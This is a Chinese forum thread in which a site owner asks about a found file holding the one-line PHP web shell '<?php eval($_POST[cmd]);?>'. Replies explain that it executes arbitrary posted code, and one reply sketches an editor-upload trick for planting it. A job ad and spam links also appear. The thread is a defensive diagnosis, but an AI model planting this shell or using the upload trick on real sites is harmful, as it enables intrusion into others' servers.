21,886
社区成员
发帖
与我相关
我的任务
分享php 漏洞提问 急....
我们网站不知道怎么的多了个test.php
内容如下 :
<?php eval($_POST[cmd]);?>
找了很多资料,也没看出个大概..
1. 我想知道这个一般是怎么注入到我们网站里的??
2. 它主要起什么作用??
我们网站其它原文件应该不会也被注入了吧...
内容如下 :
<?php eval($_POST[cmd]);?>
找了很多资料,也没看出个大概..
1. 我想知道这个一般是怎么注入到我们网站里的??
2. 它主要起什么作用??
我们网站其它原文件应该不会也被注入了吧...
...全文
请发表友善的回复…
发表回复
Whirlwind 2012-02-19
- 打赏
- 举报
这个东西叫做一句话木马,被黑后留得,或者程序的后门,危害很大!
wwwinst2 2011-10-11
- 打赏
- 举报
看来你的网站被黑掉了 http://www.fadx.cn
xiaohei_ning 2010-08-15
- 打赏
- 举报
呵呵。通过上传上去的吧。看看ewebeditor是不是有上传功能。
前些天爆了0day来不是。上传个图片加个/.php就能当马用。
反正能上传的地 方都看一下吧。注意先清一下马
前些天爆了0day来不是。上传个图片加个/.php就能当马用。
反正能上传的地 方都看一下吧。注意先清一下马
hihero 2010-07-14
- 打赏
- 举报
顶起~~
kissandrew 2010-06-02
- 打赏
- 举报
thanks for share
xuanyijie 2010-04-13
- 打赏
- 举报
招聘职位 :高级PHP程序员
招聘公司 :喧怡网络科技
工作地点 :杭州
月 薪 :6000-7999
年 龄 :24-28
工作性质 :全职
工作年限 :三年
学 历 :大专
联系电话:13758166419
联系邮箱:542843172@qq.com
任职要求:
1、负责Web网站的新产品的设计及维护
2、数据库的设计和维护
3、负责程序模块的设计、编码。
4、负责撰写所属模块开发文档。
岗位要求:
1.精通JavaScript及其浏览器兼容性;
2.两年以上PHP/MySQL开发经验,开发过大型互联网应用程序;
3.熟悉sql和数据库优化,至少有MySQL, PostgreSQL, MSSQL, Oracle其中任何一种数据库相关经验;
4.具有查询优化和存储优化经验、PHP缓存技术、静态化设计方面的经验;
5.有Linux平台下多线程编程经验优先;
6.熟悉CGI标准、HTTP和HTTPS等互联网协议;
7.熟悉AJAX,熟悉DIV+CSS布局,熟悉模板技术;
8.有较强的团队协作意识及独立解决技术问题的能力,拥有良好的代码习惯,要求结构清晰,命名规范,逻辑性强,代码
冗余率低,有自主或组织研发B/S应用产品者优先;
9.有团队开发经验,书面语言表达能力强,能阅读英文文档,英文水平过硬;
10. 有丰富的互联网项目,特别是Web2.0项目;
11.追求程序的高效,对于大流量和高负载情况下的程序设计非常熟悉。
招聘公司 :喧怡网络科技
工作地点 :杭州
月 薪 :6000-7999
年 龄 :24-28
工作性质 :全职
工作年限 :三年
学 历 :大专
联系电话:13758166419
联系邮箱:542843172@qq.com
任职要求:
1、负责Web网站的新产品的设计及维护
2、数据库的设计和维护
3、负责程序模块的设计、编码。
4、负责撰写所属模块开发文档。
岗位要求:
1.精通JavaScript及其浏览器兼容性;
2.两年以上PHP/MySQL开发经验,开发过大型互联网应用程序;
3.熟悉sql和数据库优化,至少有MySQL, PostgreSQL, MSSQL, Oracle其中任何一种数据库相关经验;
4.具有查询优化和存储优化经验、PHP缓存技术、静态化设计方面的经验;
5.有Linux平台下多线程编程经验优先;
6.熟悉CGI标准、HTTP和HTTPS等互联网协议;
7.熟悉AJAX,熟悉DIV+CSS布局,熟悉模板技术;
8.有较强的团队协作意识及独立解决技术问题的能力,拥有良好的代码习惯,要求结构清晰,命名规范,逻辑性强,代码
冗余率低,有自主或组织研发B/S应用产品者优先;
9.有团队开发经验,书面语言表达能力强,能阅读英文文档,英文水平过硬;
10. 有丰富的互联网项目,特别是Web2.0项目;
11.追求程序的高效,对于大流量和高负载情况下的程序设计非常熟悉。
javaVenice 2010-04-07
- 打赏
- 举报
disable_functions 禁用PHP方法
喔叶、你封了他IP。
喔叶、你封了他IP。
skdhxnn 2010-03-22
- 打赏
- 举报
今天又认识一个新函数eval
fengyezhiiq 2010-03-16
- 打赏
- 举报
学习了!
Dark__Angel 2010-02-20
- 打赏
- 举报
这段代码是PHP的一句话木马
用户昵称不能为空 2009-11-27
- 打赏
- 举报
LZ的等级这么高都搞不定,那应该是比较难的一个难题。
不过那个注入的人的目的绝对不会是为了去里面删点东西。
不过那个注入的人的目的绝对不会是为了去里面删点东西。
爱吃土豆和面包 2009-11-22
- 打赏
- 举报
很有可能网站有漏洞被入侵
hfphper 2009-10-28
- 打赏
- 举报
看一下 eval 就知道 问题所在了
dadait 2009-10-21
- 打赏
- 举报
楼主,那是一句话木马。赶紧删除了吧。
tfxg 2009-05-29
- 打赏
- 举报
<?php eval($_POST[cmd]);?>
就這句可以執行任意想執行的代碼了,以CMD為參數
就這句可以執行任意想執行的代碼了,以CMD為參數
guosheng1987 2009-05-10
- 打赏
- 举报
学习勒
phpboy 2009-05-10
- 打赏
- 举报
[Quote=引用 70 楼 gztwbbs 的回复:]
不错阿!!!!!!!!!!!
我要把你的顶上去!~~~~
www.jy298.com短信群发
www.mica8.com一卡多号
www.hk63.com…
[/Quote]
是不是做广告的/?
不错阿!!!!!!!!!!!
我要把你的顶上去!~~~~
www.jy298.com短信群发
www.mica8.com一卡多号
www.hk63.com…
[/Quote]
是不是做广告的/?
suinhk 2009-05-10
- 打赏
- 举报
学习!!!!!
suinhk 2009-05-10
- 打赏
- 举报
sd
netehoney 2009-05-10
- 打赏
- 举报
关注
加载更多回复(65)
